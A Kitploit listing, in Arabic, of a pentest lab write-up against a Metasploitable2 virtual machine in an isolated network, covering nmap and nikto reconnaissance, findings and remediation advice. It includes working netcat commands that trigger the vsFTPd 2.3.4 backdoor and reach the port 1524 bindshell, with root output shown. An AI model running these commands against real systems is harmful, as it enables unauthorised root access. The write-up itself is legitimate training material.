Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pentest-lab-metasploitable2 — مختبر اختبار اختراق في شبكة معزولة: الاستكشاف باستخدام nmap/nikto والاستغلال اليدوي لـ Metasploitable2 (backdoor vsFTPd CVE-2011-2523، bindshell) مع تقرير تقني كامل. | Kitploit
أدوات/GitHubGitHub/danreis20/pentest-lab-metasploitable2
الاستطلاعماسحات الثغرات الأمنية للويبتخطيط الشبكةتحليل الثغرات الأمنيةالاستغلالCTFاختبار الاختراقالأوراق والأبحاثالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
مختبرات وتدريب عملي
GitHubdanreis20/pentest-lab-metasploitable2

pentest-lab-metasploitable2

مختبر اختبار اختراق في شبكة معزولة: الاستكشاف باستخدام nmap/nikto والاستغلال اليدوي لـ Metasploitable2 (backdoor vsFTPd CVE-2011-2523، bindshell) مع تقرير تقني كامل.

عرض المستودع
3منذ 20س 34دلم تتم المراجعة بعد

مختبر اختبار الاختراق في شبكة معزولة

المؤلف: Daniel Stefan de Jesus dos Reis التاريخ: سبتمبر/2026 البيئة: مختبر شخصي KVM في شبكة افتراضية معزولة pentestlab

إشعار النطاق والتصريح

أُجري هذا الاختبار حصريًا ضد جهاز افتراضي خاص وقابل للاختراق بشكل متعمد، وزّعته Rapid7 تحديدًا لأغراض التدريب في الأمن الهجومي، داخل شبكة افتراضية معزولة بلا منفذ للإنترنت. لم يتم الوصول إلى أي نظام تابع لطرف ثالث. هذا المشروع ذو غرض تعليمي حصري، لتطوير المهارات في اختبارات الاختراق.

1. معمارية المختبر

  • الهايبرفايزر: KVM/libvirt
  • الشبكة الافتراضية: pentestlab (جسر virbr-lab)، الشبكة الفرعية 192.168.100.0/24، بدون <forward> مُهيّأ — أي شبكة معزولة فعليًا: تتواصل الأجهزة الافتراضية فيما بينها ومع المضيف، لكن ليس لديها مسار للخروج من المختبر. ملف XML الخاص بالشبكة في evidencias/pentestlab_network.xml.
  • المضيف المهاجم: جهاز المضيف نفسه، بواجهة virbr-lab، باستخدام nmap وnikto وgobuster وhydra وsqlmap وnetcat.
  • الهدف: الجهاز الافتراضي metasploitable2 (Metasploitable2، Ubuntu 8.04 معدّل)، عنوان IP 192.168.100.90/24، مُخصّص عبر DHCP من الشبكة المعزولة نفسها.
root@kitploit:~
[ Host / Atacante ]  
        |
   virbr-lab (rede isolada, sem saída para internet)
        |
[ metasploitable2 ] 

2. المنهجية

اتّبعت تدفقًا أساسيًا: الاستطلاع → التعداد → الاستغلال → التوثيق:

  1. اكتشاف المضيف ومسح كامل لمنافذ TCP مع كشف الخدمة/الإصدار (nmap -sV -sC -p-)
  2. مسح ثغرات الويب (nikto)
  3. ترتيب أولويات الثغرات المعروفة (CVE) المرتبطة بالإصدارات المُحدَّدة
  4. الاستغلال اليدوي حيث نُفّذت جميع الخطوات أدناه باستخدام nc، لفهم آلية كل خلل، وليس مجرد "تشغيل الاستغلال"
  5. توثيق الأدلة وتوصيات الإصلاح

3. الاستطلاع — المسح الكامل

الأمر: nmap -sV -sC -p- -T4 192.168.100.90 المخرجات الكاملة: evidencias/nmap_full_scan.txt

ملخص الخدمات الأكثر أهمية التي تم العثور عليها:

4. الثغرات المُستغَلّة (مؤكَّدة)

4.1 الباب الخلفي في vsFTPd 2.3.4 — CVE-2011-2523 (حرجة)

بين 30/06/2011 و03/07/2011، تم التلاعب بالكود المصدري لـ vsFTPd 2.3.4 المتاح للتنزيل من قِبل مهاجم. الإصدار المخترق يحتوي على باب خلفي: عند استقبال سلسلة نصية تنتهي بـ :) في حقل المستخدم لتسجيل الدخول عبر FTP، يفتح الخادم صدفة root على منفذ TCP 6200، دون أي مصادقة.

الخطوات المُنفَّذة (السجل الكامل في evidencias/vsftpd_backdoor_exploit.txt):

root@kitploit:~
# 1. Disparar a backdoor enviando USER terminado em ":)"
( printf 'USER test:)\r\n'; sleep 1; printf 'PASS test\r\n'; sleep 2 ) | nc -w 5 192.168.100.90 21

# 2. Conectar na porta 6200, aberta pela backdoor
( printf 'whoami\n'; printf 'id\n'; printf 'uname -a\n'; sleep 2 ) | nc -w 5 192.168.100.90 6200

النتيجة:

root@kitploit:~
uid=0(root) gid=0(root)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

تم الحصول على وصول root كامل بدون مصادقة.

4.2 Bindshell مكشوف على المنفذ 1524/tcp (حرجة)

يُحدّد nmap هذه الخدمة بالفعل باسم Metasploitable root shell — وهو باب خلفي تُرك عمدًا في الصورة (من بقايا استغلال سابق، شائع في صور التدريب). لا يتطلب استغلالًا: يكفي الاتصال.

root@kitploit:~
( printf 'whoami\n'; printf 'id\n'; sleep 2 ) | nc -w 4 192.168.100.90 1524

النتيجة: uid=0(root) gid=0(root) groups=0(root) — root فوري.

السجل الكامل في evidencias/bindshell_1524.txt.

5. الثغرات المُحدَّدة (لم تُستغَل في هذه الجولة)

5.1 UnrealIRCd 3.2.8.1 — CVE-2010-2075 (حرجة، مُحدَّدة بالإصدار)

إصدار UnrealIRCd العامل على المنفذين 6667/6697 يطابق بناءً وُزّع تاريخيًا مع باب خلفي (الأمر AB; متبوعًا بأمر صدفة). حاولت تفعيل الباب الخلفي يدويًا عبر nc، لكن الخادم تعامل مع المُدخل كأمر IRC غير صالح (451 :You have not registered) بدلًا من تنفيذ الأمر — إما أن هذه الصورة تحديدًا لا تحتوي على الملف التنفيذي المُحصَّن، أو أن الحمولة تحتاج ضبطًا دقيقًا لم أعطه أولوية في هذه الجولة. أسجّل هذا كمحاولة غير ناجحة، وليس كثغرة مؤكَّدة.

5.2 distccd 3632/tcp — CVE-2004-2687 (عالية)

خدمة تجميع موزّع تقبل أوامر عشوائية من أي عميل يتصل، بدون مصادقة. مُحدَّدة بالإصدار، لم تُستغَل في هذه الجولة.

5.3 Java RMI Registry — المنفذ 1099/tcp (عالية)

تاريخيًا عرضة لتنفيذ كود عن بُعد عبر إلغاء التسلسل. مُحدَّدة بالإصدار، لم تُستغَل في هذه الجولة.

6. تعداد الويب (nikto)

الأمر: nikto -h 192.168.100.90 -p 80 المخرجات الكاملة: evidencias/nikto_scan.txt

أبرز النتائج:

  • Apache 2.2.8 قديم (السلسلة الحالية، آنذاك، كانت 2.2.22+)
  • طريقة HTTP TRACE مُفعَّلة (احتمال XST)
  • /phpinfo.php مكشوف علنًا (يكشف إعدادات PHP)
  • /phpMyAdmin/ متاح بدون تقييد IP
  • سرد المجلدات مُفعَّل في /doc/ و/test/ و/icons/
  • ملف تعريف phpMyAdmin يُنشأ بدون علامة httponly

7. توصيات الإصلاح

8. ما أظهره هذا المختبر عمليًا

  • الاستطلاع وتعداد الشبكة باستخدام nmap (مسح كامل، كشف الخدمة/الإصدار، سكربتات NSE)
  • فهم آلية باب خلفي حقيقي (vsFTPd) واستغلاله يدويًا عبر netcat، دون الاعتماد على إطار عمل آلي
  • تحليل ثغرات الويب باستخدام nikto
  • توثيق اختبار اختراق بصيغة تقرير: النطاق، المنهجية، النتائج مرتّبة حسب الخطورة، وتوصيات الإصلاح
  • الحفاظ على بيئة مختبر معزولة وآمنة (شبكة افتراضية بلا منفذ للإنترنت)

9. الخطوات التالية

  • إعادة استغلال UnrealIRCd بإصدار صورة مؤكَّد أنه مُحصَّن، لإغلاق هذه النتيجة
  • إضافة جهاز مهاجم ثانٍ مخصّص (مثل Kali Linux) إلى شبكة pentestlab، بدلًا من الهجوم مباشرة من المضيف
  • توسيع هذا المختبر إلى سيناريو Active Directory (مشروع مخطط له بشكل منفصل)
تنزيل الأداة
المنفذالخدمةالإصدارملاحظة
21/tcpFTPvsftpd 2.3.4تسجيل دخول مجهول مسموح + باب خلفي معروف
22/tcpSSHOpenSSH 4.7p1قديم
23/tcpTelnetLinux telnetdبروتوكول نصي مكشوف
25/tcpSMTPPostfix—
80/tcpHTTPApache 2.2.8 + PHP 5.2.4phpMyAdmin وphpinfo.php مكشوفان
139/445/tcpSMBSamba 3.0.20-Debianتوقيع الرسائل معطّل
1099/tcpJava RMIGNU Classpath grmiregistryتاريخيًا عرضة لـ RCE
1524/tcpbindshell—صدفة root مفتوحة بالفعل، بدون مصادقة
3306/tcpMySQL5.0.51a-3ubuntu5—
3632/tcpdistccdv1تاريخيًا عرضة لـ RCE (CVE-2004-2687)
5432/tcpPostgreSQL8.3.0–8.3.7—
5900/tcpVNCprotocolo 3.3—
6667/6697/tcpIRCUnrealIRCd 3.2.8.1إصدار مرتبط بـ باب خلفي معروف
8180/tcpHTTPApache Tomcat 5.5—
النتيجةالتوصية
الباب الخلفي vsFTPd 2.3.4عدم استخدام ملفات تنفيذية من مصادر غير رسمية/غير موثوقة أبدًا؛ التحقق من hash/توقيع الحزم قبل التثبيت
Bindshell على المنفذ 1524تدقيق المنافذ المفتوحة بانتظام (nmap داخلي دوري)؛ أي صدفة غير موثّقة تُعدّ حادثًا
distccd مكشوف بدون مصادقةتقييده على مضيفين موثوقين عبر جدار الحماية أو تعطيله إن لم يكن قيد استخدام فعلي للتجميع الموزّع
phpMyAdmin/phpinfo.php مكشوفانتقييد الوصول عبر IP/VPN، وعدم كشف الأدوات الإدارية علنًا أبدًا
Apache/PHP قديمانالحفاظ على عملية إدارة تصحيحات فعّالة
سرد المجلدات مُفعَّلتعطيل Options Indexes في Apache
SMB مع توقيع رسائل معطّلتفعيل server signing = mandatory